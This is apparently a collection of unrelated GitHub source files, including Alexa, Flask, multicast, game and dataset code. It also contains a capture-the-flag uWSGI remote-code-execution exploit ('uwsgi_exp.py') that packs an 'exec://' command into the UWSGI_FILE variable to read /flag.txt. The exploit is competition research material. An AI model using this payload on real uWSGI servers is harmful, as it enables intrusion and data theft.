_(data.GOODBYE_MSG)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\nclass FallbackIntentHandler(AbstractRequestHandler):\n \"\"\"Single handler for Fallback Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.FallbackIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In FallbackIntentHandler\")\n speech = \"Hmm, I'm not sure. You can say Hello or Help. What would you like to do?\"\n reprompt = \"I didn't catch that. What can I help you with?\"\n\n return handler_input.response_builder.speak(speech).ask(reprompt).response\n\nclass SessionEndedRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Session End.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"SessionEndedRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n\n # Any cleanup logic goes here.\n\n return handler_input.response_builder.response\n\n\nclass IntentReflectorHandler(AbstractRequestHandler):\n \"\"\"The intent reflector is used for interaction model testing and debugging.\n It will simply repeat the intent the user said. You can create custom handlers\n for your intents by defining them above, then also adding them to the request\n handler chain below.\n \"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"IntentRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n intent_name = ask_utils.get_intent_name(handler_input)\n speak_output = _(data.REFLECTOR_MSG).format(intent_name)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n # .ask(\"add a reprompt if you want to keep the session open for the user to respond\")\n .response\n )\n\n\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"Generic error handling to capture any syntax or routing errors. 
If you receive an error\n stating the request handler chain is not found, you have not implemented a handler for\n the intent being invoked or included it in the skill builder below.\n \"\"\"\n\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = _(data.ERROR)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass LocalizationInterceptor(AbstractRequestInterceptor):\n \"\"\"\n Add function to request attributes, that can load locale specific data\n \"\"\"\n\n def process(self, handler_input):\n locale = handler_input.request_envelope.request.locale\n i18n = gettext.translation(\n 'data', localedir='locales', languages=[locale], fallback=True)\n handler_input.attributes_manager.request_attributes[\"_\"] = i18n.gettext\n\n# The SkillBuilder object acts as the entry point for your skill, routing all request and response\n# payloads to the handlers above. Make sure any new handlers or interceptors you've\n# defined are included below. The order matters - they're processed top to bottom.\n\n\nsb = SkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(HelloWorldIntentHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(CancelOrStopIntentHandler())\nsb.add_request_handler(FallbackIntentHandler())\nsb.add_request_handler(SessionEndedRequestHandler())\n# make sure IntentReflectorHandler is last so it doesn't override your custom intent handlers\nsb.add_request_handler(IntentReflectorHandler())\n\nsb.add_global_request_interceptor(LocalizationInterceptor())\n\nsb.add_exception_handler(CatchAllExceptionHandler())\n\nhandler = sb.lambda_handler()\n","repo_name":"alexa-samples/skill-sample-python-helloworld-classes","sub_path":"lambda/py/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":7561,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"60"} +{"seq_id":"43034280009","text":"from aocd import get_data\n\nROCK = 1\nPAPER = 2\nSCISSOR = 3\n\nITEMS = {'A': ROCK, 'B': PAPER, 'C': SCISSOR, 'X': ROCK, 'Y': PAPER, 'Z': SCISSOR}\n\nWIN = 6\nDRAW = 3\nLOST = 0\n\nPLAY_VALUES = {\n 'AX': DRAW,\n 'BY': DRAW,\n 'CZ': DRAW,\n 'AY': WIN,\n 'BZ': WIN,\n 'CX': WIN\n}\n\ntotal_score = 0\nfor line in get_data(day=2, year=2022).splitlines():\n play = line.strip().split(' ')\n score = ITEMS[play[1]] + PLAY_VALUES.get(play[0]+play[1], 0)\n print(f\"{play} score: {score}\")\n total_score += score\n\nprint(total_score) \n","repo_name":"ztamas83/adventofcode","sub_path":"2022/2/rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6226880793","text":"import requests, json\r\n\r\ndef requisicao(titulo):\r\n try:\r\n req = requests.get('http://www.omdbapi.com/?t='+titulo+'&apikey=b7d5c054')\r\n dicionario = json.loads(req.text)\r\n return dicionario\r\n except Exception as err:\r\n print('Erro na conexão')\r\n return None\r\n\r\nsair = False\r\n\r\ndef printar_detalhes(filme):\r\n print('Título: ', filme['Title'])\r\n print('Diretor: ', filme['Director'])\r\n print('Atores: ', filme['Actors'])\r\n print('Ano: ', filme['Year'])\r\n 
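# Worked example of the rock-paper-scissors scoring above: for a round "C X"
# (opponent scissors, we play rock) the shape is worth ITEMS['X'] = 1 and 'CX'
# appears in PLAY_VALUES as a win (6), so the round scores 7; an unlisted key
# like 'AZ' is a loss and falls back to 0 via dict.get, scoring only the shape.
ITEMS = {'A': 1, 'B': 2, 'C': 3, 'X': 1, 'Y': 2, 'Z': 3}
PLAY_VALUES = {'AX': 3, 'BY': 3, 'CZ': 3, 'AY': 6, 'BZ': 6, 'CX': 6}
for opp, me in (('C', 'X'), ('A', 'Z')):
    print(opp, me, ITEMS[me] + PLAY_VALUES.get(opp + me, 0))  # 7, then 3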
print('Nota: ', filme['imdbRating'])\r\n\r\nwhile not sair:\r\n op = input('Escreva o nome de um filme ou SAIR para fechar: ')\r\n if op == 'SAIR':\r\n sair = True\r\n print('Saindo...')\r\n else:\r\n filme = requisicao(op)\r\n if filme['Response'] == 'False':\r\n print('Filme não encontrado!')\r\n else:\r\n printar_detalhes(filme)\r\n","repo_name":"NathanCarlos/cursopyhtonbasico","sub_path":"aula13 - API-lista-de-filmes.py","file_name":"aula13 - API-lista-de-filmes.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3463282398","text":"import sqlalchemy\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\n\n# noinspection PyShadowingNames\nclass Database:\n def __init__(self, autocommit=True) -> None:\n self.base = declarative_base()\n self.engine = None\n self.session = scoped_session(sessionmaker())\n self.autocommit = autocommit\n\n def init(self, connection_url: str, echo=True, create_tables=True) -> None:\n self.engine = sqlalchemy.create_engine(connection_url, echo=echo)\n self.base.metadata.bind = self.engine\n self.session.configure(bind=self.engine)\n if create_tables:\n self.base.metadata.create_all(self.engine)\n\n def create_middleware(self) -> \"DatabaseMiddleware\":\n return DatabaseMiddleware(self)\n\n\nclass DatabaseMiddleware:\n def __init__(self, db: Database) -> None:\n self.db = db\n\n def process_response(self, req, resp, resource, req_succeeded: bool, **__) -> None:\n try:\n if self.db.autocommit:\n if req_succeeded:\n self.db.session.commit()\n else:\n self.db.session.rollback()\n finally:\n self.db.session.remove()\n","repo_name":"numberoverzero/scaffolding","sub_path":"scaffolding/middleware/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29148911419","text":"#!/usr/bin/python\n# coding: utf-8\n######################\n# Uwsgi RCE Exploit\n######################\n# Author: wofeiwo@80sec.com\n# Created: 2017-7-18\n# Last modified: 2018-1-30\n# Note: Just for research purpose\n\nimport sys\nimport socket\nimport argparse\nimport requests\n\ndef sz(x):\n s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')\n if sys.version_info[0] == 3: pass\n s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')\n return s[::-1]\n\n\ndef pack_uwsgi_vars(var):\n pk = b''\n for k, v in var.items() if hasattr(var, 'items') else var:\n pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')\n result = b'\\x00' + sz(pk) + b'\\x00' + pk\n return result\n\n\ndef parse_addr(addr, default_port=None):\n port = default_port\n if isinstance(addr, str):\n if addr.isdigit():\n addr, port = '', addr\n elif ':' in addr:\n addr, _, port = addr.partition(':')\n elif isinstance(addr, (list, tuple, set)):\n addr, port = addr\n port = int(port) if port else port\n return (addr or '127.0.0.1', port)\n\n\ndef get_host_from_url(url):\n if '//' in url:\n url = url.split('//', 1)[1]\n host, _, url = url.partition('/')\n return (host, '/' + url)\n\n\ndef fetch_data(uri, payload=None, body=None):\n if 'http' not in uri:\n uri = 'http://' + uri\n s = requests.Session()\n # s.headers['UWSGI_FILE'] = payload\n if body:\n import urlparse\n body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))\n d = s.post(uri, data=body_d)\n else:\n d = s.get(uri)\n\n return {\n 'code': 
d.status_code,\n 'text': d.text,\n 'header': d.headers\n }\n\n\ndef ask_uwsgi(var, body=''):\n return pack_uwsgi_vars(var) + body.encode('utf8')\n\n\ndef curl():\n target_url = 'http://localhost:18888/?qs'\n host, uri = get_host_from_url(target_url)\n path, _, qs = uri.partition('?')\n command = r'echo \"open(\\\"/tmp/notes/eyo-jinmo\\\", \\\"w\\\").write(repr(open(\\\"/flag.txt\\\").read()))\"'\n payload = 'exec://' + command\n var = {\n 'SERVER_PROTOCOL': 'HTTP/1.1',\n 'REQUEST_METHOD': 'GET',\n 'PATH_INFO': path,\n 'REQUEST_URI': uri,\n 'QUERY_STRING': qs,\n 'SERVER_NAME': host,\n 'HTTP_HOST': host,\n 'UWSGI_FILE': payload,\n 'SCRIPT_NAME': target_url\n }\n return ask_uwsgi(var, 'A' * 0x10000)\n\n\ndef main(*args):\n print(curl())\n\nif __name__ == '__main__':\n main()","repo_name":"Jinmo/ctfs","sub_path":"2020/pbctf/web/simple-note/uwsgi_exp.py","file_name":"uwsgi_exp.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"60"} +{"seq_id":"4163822961","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 13 02:47:58 2022\r\n\r\n@author: 86153\r\n\"\"\"\r\n\r\n\r\n############ Custom Environments #######################################\r\n\r\nfrom gym.spaces import Box, Discrete\r\nimport torch\r\nimport math\r\nfrom math import sqrt, pow\r\nimport numpy as np\r\nimport random\r\nimport gym\r\nfrom gym import spaces\r\nfrom gym.utils import seeding\r\nimport time\r\n\r\n\r\n\r\nclass Custom_Env(gym.Env):\r\n\r\n def __init__(self):\r\n \r\n # state limit\r\n self.min_position = -5000\r\n self.max_position = 5000\r\n\r\n\r\n self.low_state = np.array(\r\n [self.min_position, self.min_position], dtype=np.float32\r\n )\r\n \r\n self.high_state = np.array(\r\n [self.max_position, self.max_position], dtype=np.float32\r\n )\r\n \r\n self.observation_space = spaces.Box(\r\n low = self.low_state,\r\n high = self.high_state,\r\n dtype = np.float32\r\n ) \r\n self.action_space = Discrete(5)\r\n\r\n \r\n self.n_agent = 25\r\n self.n_s_ls, self.n_a_ls, self.coop_gamma, self.distance_mask, self.neighbor_mask \\\r\n = [], [], -1, np.zeros((self.n_agent, self.n_agent)), np.zeros((self.n_agent, self.n_agent))\r\n \r\n\r\n self.init_neighbor_mask() \r\n self.init_distance_mask() \r\n self.seed()\r\n\r\n\r\n def seed(self, seed=None):\r\n self.np_random, seed = seeding.np_random(seed)\r\n return [seed]\r\n\r\n def step(self, action):\r\n\r\n '''update state ''' \r\n\r\n return np.array(self.state), np.array(reward), np.array(done), np.array({})\r\n\r\n def get_state_(self):\r\n \r\n return State\r\n \r\n def reset(self):\r\n \r\n '''reset state'''\r\n \r\n return np.array(self.state)\r\n\r\n\r\n def init_neighbor_mask(self):\r\n n = self.n_agent\r\n for i in range(n):\r\n self.neighbor_mask[i][i] = 1\r\n self.neighbor_mask[i][(i+1)%n] = 1\r\n self.neighbor_mask[i][(i+n-1)%n] = 1\r\n\r\n def init_distance_mask(self):\r\n n = self.n_agent\r\n for i in range(n):\r\n for j in range(n):\r\n self.distance_mask[i][j] = min((i-j+n)%n, (j-i+n)%n)\r\n\r\n\r\n","repo_name":"PKU-MARL/Model-Based-MARL","sub_path":"algorithms/envs/Custom_Env.py","file_name":"Custom_Env.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"60"} +{"seq_id":"21920897625","text":"import sys\nimport numpy as np\n\nclass QGSM_Distributions:\n\n def __init__(self,energy):\n\n print(\"Reading files...\")\n path = \"../data/rawData/\"+str(energy)+\"/data/\"\n 
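# Byte-level view of the uwsgi packet builder above: every key/value is
# prefixed with a 2-byte little-endian length, and the var block gets a 4-byte
# header (modifier1=0, datasize, modifier2=0). int.to_bytes is equivalent to
# the hex-string version of sz() used in the exploit; sketch for one var:
def sz2(x):
    n = x if isinstance(x, int) else len(x)
    return n.to_bytes(2, 'little')
pk = sz2('KEY') + b'KEY' + sz2('VAL') + b'VAL'
packet = b'\x00' + sz2(pk) + b'\x00' + pk
print(packet)  # b'\x00\n\x00\x00\x03\x00KEY\x03\x00VAL'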
eventNr, nrParticles = np.loadtxt(path+\"B_MULT\",dtype=int,usecols=(0,2),unpack=True)\n NPOM = np.loadtxt(path+\"NPOM.dat\",dtype=int)\n finalpr = open(path+\"finalpr.data\",'r')\n \n self.path = path\n self.eventNr, self.nrParticles, self.finalpr, self.NPOM =\\\n eventNr, nrParticles, finalpr, NPOM\n\n def closeFile(self):\n self.finalpr.close()\n\n def collectData(self):\n\n eventNr, nrParticles, finalpr, NPOM =\\\n self.eventNr, self.nrParticles, self.finalpr, self.NPOM\n\n self.lineCount = 0\n total = len(eventNr)\n tol = 10e-9\n inElasticEvents = 0\n elasticEvents = 0\n startParticle = 0\n endParticle = 0\n\n ALL = []\n eventNr = eventNr[::]\n nrParticles = nrParticles[::]\n print(\"Collecting data...\")\n for event,nrParts in zip(eventNr,nrParticles):\n\n if nrParts == 2:\n elasticEvents += 1\n finalpr.readline()\n finalpr.readline()\n else:\n inElasticEvents += 1\n\n for count in range(nrParts):\n parton = finalpr.readline()\n #[startParticle : startParticle+nrParts]:\n\n parton = list(map(float,parton.strip().split()))\n\n E = parton[4]\n px = parton[5]\n py = parton[6]\n pz = parton[7]\n C = parton[13]\n\n if C != 0:\n p = np.sqrt(px**2 + py**2 + pz**2) \n pTransverse = np.sqrt(px**2 + py**2)\n if pTransverse > 0.3 and pTransverse < 1.5:\n if abs(E-pz)',\n methods=['GET', 'DELETE', 'PUT'],\n strict_slashes=False)\ndef get_amenity_id(amenity_id):\n '''Retrieves a Amenity object'''\n amenity_obj = storage.get(Amenity, amenity_id)\n if not amenity_obj:\n abort(404)\n\n if request.method == \"GET\":\n return jsonify(amenity_obj.to_dict())\n\n elif request.method == \"DELETE\":\n storage.delete(amenity_obj)\n storage.save()\n return jsonify({}), 200\n\n elif request.method == \"PUT\":\n if not request.is_json:\n abort(400, description=\"Not a JSON\")\n\n amenity_json = request.get_json()\n not_needed = [\"id\", \"created_at\", \"updated_at\"]\n for attr, attr_value in amenity_json.items():\n if attr not in not_needed:\n setattr(amenity_obj, attr, attr_value)\n amenity_obj.save()\n return jsonify(amenity_obj.to_dict()), 200\n","repo_name":"mukhtarB/AirBnB_clone_v4","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74262471872","text":"# from agency.business_logic.car_model import Car_Model\nfrom .booking import Booking\nfrom .fixed_booking import FixedBooking\nfrom ..models import BOOKING, FIXED_BOOKING\nfrom django.core.exceptions import ObjectDoesNotExist\n\nclass BookingList:\n def __init__(self):\n pass\n\n def add_booking(self,trip,allocated_car,allocated_hotel,customer):\n new_booking = Booking(trip,allocated_car,allocated_hotel,customer)\n new_booking.save()\n return new_booking\n \n def add_fixed_booking(self, trip, customer):\n new_booking = FixedBooking(trip, customer)\n new_booking.save()\n return new_booking\n \n def get_booking(self,booking_id):\n try:\n searched_booking = BOOKING.objects.get(id=booking_id)\n return searched_booking\n except ObjectDoesNotExist:\n raise Exception(f'{id} does not exist!')\n\n def get_fixed_booking(self,booking_id):\n try:\n searched_booking = FIXED_BOOKING.objects.get(id=booking_id)\n return searched_booking\n except ObjectDoesNotExist:\n raise Exception(f'{id} does not 
exist!')","repo_name":"affan-ansari/travel_management","sub_path":"agency/business_logic/booking_list.py","file_name":"booking_list.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
+{"seq_id":"42732760599","text":"import socket\nimport signal\nimport pyuv\nimport json\nfrom time import *\n\ng_listenip = \"0.0.0.0\"\ng_multicast_port = 30001\n\nJsonType = 0\nProtoType = 1\ntopicType = 0\nserviceType = 1\n\n# json callback info\nclass JsnCallBack(object):\n    def __init__(self):\n        self.topicName = \"\"\n        self.jsnSub = None # std::function \n        self.jsnCb = None # std::function \n\nclass MsgCallBack(object):\n    def __init__(self):\n        self.topicName = \"\"\n        self.MsgCb = None # std::function\n        self.msgCb = None \n\nclass ServiceCall(object):\n    def __init__(self):\n        self.serviceName = \"\"\n        self.servCall = \"\" # std::function &callback)>\n        self.callback = None # std::function\n        self.params = {} # json params\n\nclass Multicast(object):\n\n    # multicast init\n    def __init__(self,multicast_addr,localip):\n        # get local socket name\n        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        sock.connect((\"8.8.8.8\",80))\n        self.__m_localip = sock.getsockname()[0]\n        print(\"local ip \",self.__m_localip)\n\n        # init recv_socket\n        self.loop = pyuv.Loop.default_loop()\n        self.__m_multicast_addr = multicast_addr\n        self.__m_recv_socket = pyuv.UDP(self.loop)\n        self.__m_recv_socket.bind((g_listenip,g_multicast_port),pyuv.UV_UDP_REUSEADDR)\n        self.__m_recv_socket.set_membership(multicast_addr,pyuv.UV_JOIN_GROUP)\n        self.__m_recv_socket.set_broadcast(True)\n        self.__m_recv_socket.start_recv(self.handlerRecv) # receive handler\n\n        # init send_socket\n        self.__m_send_socket = pyuv.UDP(self.loop)\n        self.__m_send_socket.bind((g_listenip,g_multicast_port),pyuv.UV_UDP_REUSEADDR)\n        # self.__m_send_socket.set_membership(multicast_addr,pyuv.UV_JOIN_GROUP)\n\n        # \n        self.__m_localEndpoint = \"\"\n        self.__m_localrpcEndpoint = \"\"\n        self.__m_jsnCbMap = {}\n        self.__m_msgCbMap = {}\n        self.__m_serviceCallMap = {}\n        self.__m_topicMap = {} # std::unordered_map>\n        self.__m_serviceMap = {} # std::unordered_map>\n\n        self.__m_signal_h = pyuv.Signal(self.loop)\n        self.__m_signal_h.start(self.signal_handler, signal.SIGINT)\n    \n    def get_localip(self):\n        return self.__m_localip\n\n    # if ctrl + c signal , then close socket\n    def signal_handler(self,handle, signum):\n        self.__m_signal_h.close()\n        self.__m_recv_socket.close()\n        self.__m_send_socket.close()\n\n    def __del__( self ):\n        # deconstruct function\n        pass\n    \n    def setLocalEndpoint(self,pubsubEndpoint,rpcEndpoint):\n        self.__m_localEndpoint = pubsubEndpoint\n        self.__m_localrpcEndpoint = rpcEndpoint\n    \n    def dealDelayCallBack(self,topicName):\n        jsoncall = self.__m_jsnCbMap.get(topicName)\n        if(jsoncall != None):\n            jsncb = jsoncall.jsnCb\n            jsoncall.jsnSub(topicName,jsncb) # call json sub\n            del self.__m_jsnCbMap[topicName]\n        \n        # call msg sub for protobuf\n        \n    def dealServiceDelayCall(self,serviceName):\n        service_call = self.__m_serviceCallMap.get(serviceName)\n        if(service_call != None):\n            params = service_call.params\n            callback = service_call.callback\n            service_call.servCall(serviceName,params,callback)\n            del self.__m_serviceCallMap[serviceName]\n\n    # update topic map or service map\n    def updateMap(self,type,result):\n        if(type == topicType):\n            print(\"update topic map\")\n            endpoints = self.__m_topicMap.get(result[\"topic\"]) #topic may have several server endpoints\n            endpoint = result[\"endpoint\"]\n            if(endpoints != None): # find topic and related endpoints list\n                if(endpoint in endpoints): # already has endpoint in list\n                    return\n                else:\n                    self.__m_topicMap[result[\"topic\"]].append(endpoint)\n            else: # not found then insert\n                ends = []\n                ends.append(endpoint)\n                self.__m_topicMap[result[\"topic\"]] = ends\n        \n        # service type\n        elif(type == serviceType): \n            print(\"update service map\")\n            endpoints = self.__m_serviceMap.get(result[\"service\"])\n            endpoint = result[\"endpoint\"]\n            if(endpoints != None): # find service and related endpoints list\n                if(endpoint in endpoints): # already has endpoint in list\n                    return\n                else:\n                    self.__m_serviceMap[result[\"service\"]].append(endpoint)\n            else: # not found then insert\n                ends = []\n                ends.append(endpoint)\n                self.__m_serviceMap[result[\"service\"]] = ends\n\n    def findLocalSupport(self,supportName,type):\n        if(type == topicType):\n            self.sendRspToPeer(self.__m_topicMap,supportName,self.__m_localEndpoint, \"topic\")\n        elif(type == serviceType):\n            self.sendRspToPeer(self.__m_serviceMap,supportName,self.__m_localrpcEndpoint, \"service\")\n\n    # map : {service_name/topic_name,[endpoints]}\n    def sendRspToPeer(self,map,supportName,endpoint,field):\n        print(\"start to send response\")\n        map.setdefault(supportName,None) # set default to prevent code collapse\n        endpoints = map[supportName]\n        if(endpoints != None):\n            if endpoint in endpoints:\n                json_dict = {\n                    \"method\" : \"response\",\n                    field : supportName,\n                    \"endpoint\" : endpoint\n                }\n                json_str = json.dumps(json_dict)\n                json_bytes = bytes(json_str, encoding = \"utf8\")\n                self.__m_recv_socket.send((self.__m_multicast_addr,g_multicast_port),json_bytes)\n\n    def multicastTopic(self,topicName,endpoint):\n        json_dict = {\n            \"method\" : \"commonMulti\",\n            \"topic\" : topicName,\n            \"endpoint\" : endpoint\n        }\n        json_str = json.dumps(json_dict)\n        json_bytes = bytes(json_str, encoding = \"utf8\")\n        print(\"__m_multicast_addr is \",self.__m_multicast_addr)\n        print(\"g_multicast_port is \",g_multicast_port)\n        self.__m_send_socket.send((self.__m_multicast_addr,g_multicast_port),json_bytes)\n\n    def sendRequest(self,supportName,field):\n        json_dict = {\n            \"method\" : \"request\",\n            field : supportName,\n            \"endpoint\" : \"\"\n        }\n        print(\"send request\")\n        json_str = json.dumps(json_dict)\n        json_bytes = bytes(json_str, encoding = \"utf8\")\n        self.__m_send_socket.send((self.__m_multicast_addr,g_multicast_port),json_bytes)\n    \n    def multicastService(self,serviceName,endpoint):\n        json_dict = {\n            \"method\" : \"commonMulti\",\n            \"service\" : serviceName,\n            \"endpoint\" : endpoint\n        }\n        print(\"send service endpoint\")\n        json_str = json.dumps(json_dict)\n        json_bytes = bytes(json_str, encoding = \"utf8\")\n        self.__m_send_socket.send((self.__m_multicast_addr,g_multicast_port),json_bytes)\n    \n    # endpoints : endpoint list\n    def findTopic(self,topicName,endpoints):\n        res = True\n        # print(\"finding topic name in local map: \" ,topicName)\n        topic_endpoints = self.__m_topicMap.get(topicName)\n        if(topic_endpoints == None): #can not find topic\n            print(\"can not find topic name in local map\")\n            res = False\n            return res\n        endpoints = topic_endpoints\n        return res\n\n    # endpoints : endpoint list\n    def findService(self,serviceName,endpoints):\n        res = True\n        print(\"finding service name in local map: \" ,serviceName)\n        service_endpoints = self.__m_serviceMap.get(serviceName)\n        if(service_endpoints == None): #can not find service\n            res = False\n            return res\n        endpoints = service_endpoints\n        return res\n\n    # std::unordered_map\n    # struct JsnCallBack{\n    #     std::string topicName;\n    #     std::function jsnSub;\n    #     JsnCb jsnCb;\n    #     ~JsnCallBack(){}\n    # };\n    # JsnCallBack\n    def pushTopic_JsonCallBack(self,JsnCallBack):\n        self.__m_jsnCbMap[JsnCallBack.topicName] = JsnCallBack\n    \n    def pushServiceCallBack(self,serviceCall):\n        self.__m_serviceCallMap[serviceCall.serviceName] = serviceCall\n    \n    def run(self):\n        self.loop.run() #run multicast service\n        print(\"socket disconnect\")\n    \n    def handlerRecv(self,handle, ip_port, flags, data, error):\n        print(\"get into handler Recv\")\n        if(error is None):\n            if(data is not None):\n                json_str = str(data, encoding = \"utf-8\") \n                result = json.loads(json_str)\n                print(\"receive json is : \",result)\n\n                if(result.get(\"endpoint\") is not None):\n                    method = result[\"method\"]\n                    # if receive topic msg\n                    if(result.get(\"topic\") is not None):\n                        if(method == \"commonMulti\"):\n                            self.updateMap(topicType,result)\n                            self.dealDelayCallBack(result[\"topic\"])\n                        elif(method == \"request\"):\n                            self.findLocalSupport(result[\"topic\"],topicType)\n                        elif (method == \"response\"):\n                            self.updateMap(topicType,result)\n                            self.dealDelayCallBack(result[\"topic\"])\n                    # deal service msg\n                    elif(result.get(\"service\") is not None):\n                        if(method == \"commonMulti\"):\n                            self.updateMap(serviceType,result)\n                            self.dealServiceDelayCall(result[\"service\"])\n                        elif(method == \"request\"):\n                            self.findLocalSupport(result[\"service\"],serviceType)\n                        elif(method == \"response\"):\n                            self.updateMap(serviceType,result)\n                            self.dealServiceDelayCall(result[\"service\"])\n        else:\n            print(\"error is \",error)\n\ndef multicast_test(mult1):\n    mult1.multicastService(\"add\",\"192.168.1.3\")\n    mult1.multicastTopic(\"sub\",\"192.34.2.2\")\n    mult1.sendRequest(\"topic_request\",\"topic\")\n    mapset = {\"topic_response\" : [\"192\",\"168\"]}\n    mult1.sendRspToPeer(mapset,\"topic_response\",\"192\",\"topic\")\n\nimport threading\n\nif __name__ == \"__main__\":\n    mult1 = Multicast(\"239.255.0.1\",10001)\n    thread1 = threading.Thread(target=multicast_test,args=(mult1,),name=\"thread1\")\n    thread2 = threading.Thread(target=multicast_test,args=(mult1,),name=\"thread2\")\n    thread3 = threading.Thread(target=multicast_test,args=(mult1,),name=\"thread3\")\n\n    thread1.start()\n    thread2.start()\n    thread3.start()\n\n    mult1.run()\n    thread1.join()\n    thread2.join()\n    thread3.join()\n    \n","repo_name":"Jackybecomebetter/BAOSNode-python","sub_path":"script/multicast.py","file_name":"multicast.py","file_ext":"py","file_size_in_byte":11310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"15728587571","text":"from Utilities import Util\n\nclass Snakes:\n    \n    def __init__(self):\n        self.body_size = Util.BODY_PARTS\n        self.coordinates = []\n        self.squares = []\n        \n        for i in range(0, Util.BODY_PARTS):\n            self.coordinates.append([0, 0])\n        \n        for x, y in self.coordinates:\n            square = Util.canvas.create_rectangle(x, y, x + Util.SPACE_SIZE, y + Util.SPACE_SIZE, fill=Util.SNAKE_COLOR, tag=\"snake\")\n            self.squares.append(square)\n","repo_name":"21-02497/IT2102_SnakeGame","sub_path":"Snakes.py","file_name":"Snakes.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
+{"seq_id":"74898335230","text":"from funcoes import rola_dado\r\nfrom time import sleep\r\n\r\nprint(\"----------------------------\")\r\nprint(\"       Jogue o dado         \")\r\nprint(\"----------------------------\")\r\n\r\n\r\n\r\nwhile True:\r\n    escolha = input(\"Digite  para rolar o seu dado: \")\r\n    usuario = rola_dado()\r\n    print(\"Agora é minha vez de jogar ...\")\r\n    for s in range(0,3):\r\n        for i in range(0,3):\r\n            print(\".\", end='\\r')\r\n            sleep(0.5)\r\n    
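# For reference, pyuv's set_membership(addr, UV_JOIN_GROUP) used in the
# Multicast class above maps onto the standard-library equivalent below --
# a sketch, not wired into that class: joining an IPv4 multicast group via
# IP_ADD_MEMBERSHIP on a reusable UDP socket.
import socket, struct
def join_group(group="239.255.0.1", port=30001):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0", port))
    # ip_mreq: 4-byte group address + 4-byte local interface address
    mreq = struct.pack("4s4s", socket.inet_aton(group), socket.inet_aton("0.0.0.0"))
    s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    return s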
\n for _ in range(1, 1000000): # _ is the convention for a loop variable that is not used\n pass\n computador = rola_dado()\n print(f\"You: {usuario} - Me: {computador}\")\n if usuario > computador:\n print(\"You won!!\")\n elif computador == usuario:\n print(\"It's a tie!!\")\n else:\n print(\"I won!!\")\n opcao = input(\"Would you like to play again? (Y/N): \")\n if opcao.upper() == \"N\":\n break\nprint(\"Thanks for playing! Now go study!!!\")","repo_name":"GesleyOliveira/Algoritmos","sub_path":"Aula13/jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"31543299404","text":"import torch\r\nimport cv2\r\nimport os\r\nimport os.path\r\nimport random\r\nimport numpy as np\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torchvision.transforms import ToTensor\r\nfrom PIL import Image\r\n\r\nCLASS_NUM = 20 # change this when using a different training set\r\n\r\n\r\nclass yoloDataset(Dataset):\r\n image_size = 448 # input image size\r\n\r\n def __init__(self, img_root, list_file, train, transform): # list_file is the label txt file; img_root is the image directory\r\n self.root = img_root\r\n self.train = train\r\n self.transform = transform\r\n # the txt file is parsed below and its contents sorted into the following three lists\r\n self.fnames = []\r\n self.boxes = []\r\n self.labels = []\r\n\r\n self.S = 7 # YOLOv1 grid size\r\n self.B = 2 # boxes per cell\r\n self.C = CLASS_NUM # number of 